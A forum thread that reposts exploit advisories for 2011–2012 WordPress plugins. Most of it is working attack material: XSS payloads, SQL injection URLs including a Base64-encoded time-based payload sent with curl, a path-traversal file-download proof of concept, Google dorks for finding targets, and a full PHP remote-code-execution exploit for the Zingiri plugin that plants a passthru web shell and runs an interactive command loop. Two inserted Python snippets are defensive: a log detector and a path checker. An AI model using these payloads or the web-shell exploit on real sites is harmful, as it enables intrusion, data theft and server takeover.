    http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)
    (c) bugsearch
     
    30 Oct 2011
  16. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    WordPress Classipress Theme <= 3.1.4 Stored XSS

    # Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
    # Date: 2011-09-26
    # Author: Paul Loftness
    # Contact:http://attackvectorlabs.blogspot.com
    # Vendor: Appthemes LLc.
    # Product Web Page: http://www.appthemes.com/themes/classipress/
    # Version: <=3.1.4
    # Tested Versions: 3.1.4, 3.0.5.3

    Summary:

    ClassiPress is a popular and widely used classified ads software for WordPress.

    Description:

    Classipress is vulnerable to multiple stored XSS vulnerabilities. Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitised or poorly sanitised (version specific), allowing the attacker to insert Javascript code.

    In version 3.0.5.2 and presumably all previous versions, no sanitation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4, the less-than character is sanitised but an attacker can still insert quotes and place an event handler in the tag.


    Proof-of-Concept Code:

    Insertion page: http://example_site/author/profile/
    Infected page: http://example_site/author/attacker_username/
    Note: Some sites replace "author" with another path, this is not a vanilla configuration, however.

    Version: ClassiPress 3.0.5.2
    Vulnerable Input Parameters:

    Code:
    twitter_id: " onmouseover="alert('XSS');
    facebook_id: " onmouseover="alert('XSS');
    Alternate Exploit code:
    Code:
    twitter_id: "><script>alert('XSS');</script><div id="
    facebook_id: "><script>alert('XSS');</script><div id="

    Version: ClassiPress 3.1.4
    Vulnerable Input Parameters:

    Code:
    twitter_id: " onmouseover='alert("XSS");'><
    facebook_id: " onmouseover='alert("XSS");'><
    WordPress WP Glossary Plugin SQL Injection

    ######################################################
    # Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
    # Date: 2011-30-10
    # Author: longrifle0x
    # software: Wordpress
    # Download: http://wordpress.org/extend/plugins/wp-glossary/
    # Tools: SQLMAP
    ######################################################

    *DESCRIPTION: Discovered a vulnerability in WP Glossary, a Wordpress plugin;
    the vulnerability is SQL injection.

    File:
    Code:
    wp-content/plugins/wp-glossary/ajax.php
    Exploit: id=-1; or 1=if
    Exploitation:
    Code:
    http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
    [GET][id=-1][CURRENT_USER()
    http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
    [GET][id=-1][SELECT
    (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
    0,1)='Y') THEN 1 ELSE 0 END)
    http://localhost:80/
    wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
    Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution

    PHP:
    <?php

    /*
    ------------------------------------------------------------------------
    Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit
    ------------------------------------------------------------------------

    author...............: Egidio Romano aka EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/
    affected versions....: from 0.9.12 to 2.2.3

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only. |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] vulnerable code in /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php

    37. @ob_start();
    38. include_once(CLASS_SESSION_ACTION);
    39. $sessionAction = new SessionAction(); 
    40. $selectedDocuments = $sessionAction->get();
    41. if(removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id']) && sizeof($selectedDocuments))
    42. {
    43. if(($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false)
    44. {
    45. $selectedDocuments[$key] = $_POST['value'];
    46. $sessionAction->set($selectedDocuments);
    47. 
    48. }
    49. echo basename($_POST['id']) . "\n";
    50. displayArray($selectedDocuments);
    51. 
    52. }elseif(removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id']))
    53. {
    54. $sessionAction->setFolder($_POST['id']);
    55. }
    56. writeInfo(ob_get_clean());

    An attacker could be able to manipulate the $selectedDocuments array that will be displayed at line 50;
    then at line 56 the 'writeInfo' function is called using the current buffer contents as argument.
    Like my recently discovered vulnerability (http://www.exploit-db.com/exploits/18075/), this function
    writes into a file called 'data.php', so an attacker could be able to execute arbitrary PHP code.

    [-] Note:

    The same vulnerability also affects the Joomla component (http://extensions.joomla.org/extensions/e-commerce/shopping-cart/13580)
    but isn't exploitable due to a misconfiguration in the 'CONFIG_SYS_ROOT_PATH' constant definition.

    [-] Disclosure timeline:

    [23/11/2011] - Vulnerability discovered
    [25/10/2011] - Issue reported to http://forums.zingiri.com/
    [12/11/2011] - Version 2.2.4 released
    [13/11/2011] - Public disclosure

    */

    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout", 5);

    $fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";

    function http_send($host, $packet)
    {
        if (!($sock = fsockopen($host, 80)))
            die("\n[-] No response from {$host}:80\n");

        fwrite($sock, $packet);
        return stream_get_contents($sock);
    }

    function get_root_dir()
    {
        global $host, $path, $fileman;

        $packet  = "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Connection: close\r\n\r\n";

        if (!preg_match('/currentFolderPath" value="([^"]*)"/', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");
        return $m[1];
    }

    function random_mkdir()
    {
        global $host, $path, $fileman, $rootdir;

        $dirname = uniqid();

        $payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";
        $packet  = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Connection: close\r\n\r\n{$payload}";

        http_send($host, $packet);
        return $dirname;
    }

    print "\n+----------------------------------------------------------------------------------+";
    print "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";
    print "\n+----------------------------------------------------------------------------------+\n";

    if ($argc < 3)
    {
        print "\nUsage......: php $argv[0] <host> <path>\n";
        print "\nExample....: php $argv[0] localhost /";
        print "\nExample....: php $argv[0] localhost /wordpress/\n";
        die();
    }

    $host = $argv[1];
    $path = $argv[2];

    $rootdir = get_root_dir();
    $phpcode = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";

    $payload = "selectedDoc[]={$phpcode}&currentFolderPath={$rootdir}";
    $packet  = "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";

    if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");

    $dirname = random_mkdir();
    $newname = uniqid();

    $payload = "value={$newname}&id={$rootdir}{$dirname}";
    $packet  = "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: {$sid[1]}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";

    http_send($host, $packet);

    $packet  = "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cmd: %s\r\n";
    $packet .= "Connection: close\r\n\r\n";

    while(1)
    {
        print "\nzingiri-shell# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
    }

    ?>
    WordPress AdRotate plugin <= 3.6.6 SQL Injection

    # Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
    # Date: 2011-11-8
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
    # Version: 3.6.6 (tested)
    # Note: parameter $_GET["track"] has to be Base64 encoded


    PoC

    Code:
    http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
    e.g.
    Code:
    #!/bin/bash
    payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
    encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
    curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded

    Vulnerable code

    Code:
    if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare()
    (c) bugsearch
     
    15 Nov 2011
    1 person likes this.
  17. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    Wordpress UPM-POLLS Plugin 1.0.4 Blind SQL Injection


    Code:
    # Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4
    # Google Dork: n/a
    # Date: 04-12-2011
    # Author: Saif El-Sherei
    # Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip
    # Version: 1.0.4
    # Tested on: wordpress 3.2.1,Firefox 4, XAMPP

    Info:

    Best Plugin to create Polls for your site. Everything is smoother, faster,
    and seamless like WordPress itself.

    Poll Manager,
    Ability to set general and post/page specific polls,
    Ability to leaf over the polls
    Ability to add certain poll in certain post content
    Ability to show polls either with and without current results of
    polls


    Details:

    The variable PID is not properly sanitized in the GET request before
    insertion into the database query, allowing an attacker or any user who
    can view poll results (supposedly all users) to use blind SQL injection to
    extract database data and possibly compromise the whole server. A PoC is
    provided with both true and false results.

    POC 1(TRUE):

    Code:
    http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and 1=1
    "poll results for poll 2 is displayed"

    POC 2 (FALSE):

    Code:
    http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and 1=2
    "Blank page is displayed"

    (c) exploit-db.com
     
    11 Dec 2011
    1 person likes this.
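A log-triage check for the two injection cases in the posts above (the AdRotate `track` parameter, which the plugin Base64-decodes before use, and the UPM-POLLS `PID` parameter), added here as an example and not taken from either advisory: it decodes each request's parameters the way the plugin would, so a payload hidden inside Base64 is inspected in clear, then flags common injection indicators. The sample log lines, the list of Base64 parameters and the indicator patterns are constructed assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the plugin Base64-decodes before use (AdRotate's adrotate-out.php?track=...).
BASE64_PARAMS = {"track"}  # assumed list; extend per plugin

# Coarse injection indicators for log triage (not a blocking rule).
SQLI_PATTERN = re.compile(
    r"(?:and|or)\s+\d+\s*=\s*\d+"      # boolean probes: and 1=1 / and 1=2
    r"|(?:benchmark|sleep)\s*\("       # time-based probes, as in the AdRotate PoC
    r"|union\s+(?:all\s+)?select\b"    # union-based extraction
    r"|'\s*(?:and|or)\b"               # quote breaking out of a string literal
    r"|(?:#|--)\s*$",                  # trailing comment terminator
    re.IGNORECASE,
)

# Request field of an Apache combined log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

def decoded_params(uri):
    """Yield (name, value) as the plugin sees them: percent-decoded, and
    additionally Base64-decoded for parameters the plugin decodes."""
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if name in BASE64_PARAMS:
            try:
                value = base64.b64decode(value, validate=True).decode("utf-8", "replace")
            except ValueError:
                pass  # not valid Base64: inspect the raw value instead
        yield name, value

def find_sqli(log_lines):
    """Return [(uri, param, decoded_value)] for requests whose decoded
    parameters match an injection indicator."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        uri = m.group("uri") if m else ""
        hits += [(uri, n, v) for n, v in decoded_params(uri) if SQLI_PATTERN.search(v)]
    return hits

# Constructed sample log: the AdRotate PoC, the UPM-POLLS PoC, and a benign
# AdRotate click whose track value decodes to "1-2-3".
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Nov/2011:10:12:01 +0000] "GET /wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj HTTP/1.1" 200 512',
    '203.0.113.7 - - [04/Dec/2011:11:03:44 +0000] "GET /wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2%20and%201=1 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [08/Nov/2011:10:15:09 +0000] "GET /wp-content/plugins/adrotate/adrotate-out.php?track=MS0yLTM%3D HTTP/1.1" 302 0',
]
```

A plain grep for BENCHMARK over the raw log misses the first line entirely; decoding first is what makes it visible.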
  18. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    #Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
    #Version: < 1.4.2
    #Date: 2011-12-19
    #Author: 6Scan (http://6scan.com) security team
    #Software Link: http://wordpress.org/extend/plugins/mailz/
    #Official fix: This advisory is released after the vendor (http://www.zingiri.com) was contacted and fixed the issue promptly.
    #Description : Unauthorized users can download arbitrary files from the server using this exploit.
    #Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
    #The bug is in config.php, but accessible from other file.

    PoC

    1) Setup mysql database
    2) Create table with the next structure:


    Code:
    CREATE TABLE IF NOT EXISTS `phplist_attachment` (
      `filename` varchar(1024) NOT NULL,
      `mimetype` varchar(1024) NOT NULL,
      `remotefile` varchar(1024) NOT NULL,
      `description` varchar(1024) NOT NULL,
      `size` int(11) NOT NULL,
      `id` int(11) NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    3) Add this row into the database:

    Code:
    INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
    ('../../../../../somefile.txt', '', '', '', 0, 0);

    4) Call the script with database parameters and file id to download:

    Code:
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0
    The credentials are now saved in session, and there is no need to continue passing them:

    Code:
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
    http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3
     
    26 Dec 2011
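For the Mailz download script above, the check a reviewer would want is that a filename read from the attachment table can never leave the attachment directory, whatever the database row says. The Python below is an added example, not the plugin's code; the directory layout it builds is constructed, with somefile.txt standing in for the file the advisory's row points at.

```python
import os
import tempfile

def resolve_attachment(attachment_root, db_filename):
    """Map a filename read from the attachment table onto a file under
    attachment_root. Return its real path, or None when the name is absolute,
    escapes the root through '..' or a symlink, or names no regular file."""
    if os.path.isabs(db_filename):
        return None  # the table should only ever hold names relative to the root
    root = os.path.realpath(attachment_root)
    # realpath() collapses '..' and follows symlinks, so the containment test
    # below sees where the file really lives, not how it was spelled
    candidate = os.path.realpath(os.path.join(root, db_filename))
    if os.path.commonpath([root, candidate]) != root:
        return None  # resolved outside the attachment directory
    return candidate if os.path.isfile(candidate) else None

def demo():
    """Constructed scenario: one legitimate attachment, a file outside the
    root, and a symlink inside the root pointing at that outside file."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "attachments")
        os.mkdir(root)
        with open(os.path.join(root, "newsletter.pdf"), "w") as f:
            f.write("constructed attachment")
        with open(os.path.join(tmp, "somefile.txt"), "w") as f:
            f.write("constructed secret")
        os.symlink(os.path.join(tmp, "somefile.txt"), os.path.join(root, "link.txt"))
        results["legit"] = resolve_attachment(root, "newsletter.pdf") is not None
        results["traversal"] = resolve_attachment(root, "../../../../../somefile.txt")
        results["absolute"] = resolve_attachment(root, "/etc/passwd")
        results["symlink"] = resolve_attachment(root, "link.txt")
    return results
```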
  19. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    Wordpress Pay With Tweet Plugin <= 1.1 Multiple Vulnerabilities



    # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
    # Date: 01/06/2012
    # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
    # Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
    # Version: 1.1


    1)
    Blind SQL Injection in shortcode:
    Short code parameter 'id' is prone to blind sqli,
    you need to be able to write a post/page to exploit this:

    Code:
    [paywithtweet id="1' AND 1=2"]
    [paywithtweet id="1' AND 1=1"]
    2)
    Multiple XSS in pay.php
    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

    After connecting to twitter:
    Code:
    ?link=%22></input>[XSS]
    After submitting the tweet:
    Code:
    ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]
    The final download link will be replaced with [REDIRECT-TO-URL]

    POC:
    Code:
    pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>
    (c) exploit-db.com

    Wordpress Comment Rating plugin Multiple Vulnerabilities


    # Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities
    # Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
    # 2- inurl:"/ck-processkarma.php?id="
    # Date: 2/1/2012
    # Author: The Evil Thinker
    # Contact : Enstene156@hotmail.fr
    # Software Link: www.wordpress.com
    # Vulnerable plugin: Comment rating plugin
    # Tested on: Linux


    Details :

    the vulnerable file is "ck-processkarma.php"
    the script doesn't filter the input parameters (id "sql", path "XSS")

    Poc 1 (XSS) :

    Code:
    http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=

    Poc 2 (SQL injection) :

    Code:
    http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
     
    Last edited: 7 Jan 2012
    7 Jan 2012
  20. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    Wordpress taggator plugin Sql Injection Vulnerabilities

    Code:
    #
    # Author : #BHG Security Center - IrIsT Security Team
    #
    # Discovered By : Am!r
    #
    # Home : http://Black-hg.Org - http://IrIsT.Ir
    #
    # Software Link : http://wordpress.org/extend/plugins/taggator/
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : "Powered by Wordpress"
    #
    
    Expl0iTs :

    Code:
    http://site.eu/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
    (c) securityfocus
     
    6 Apr 2012
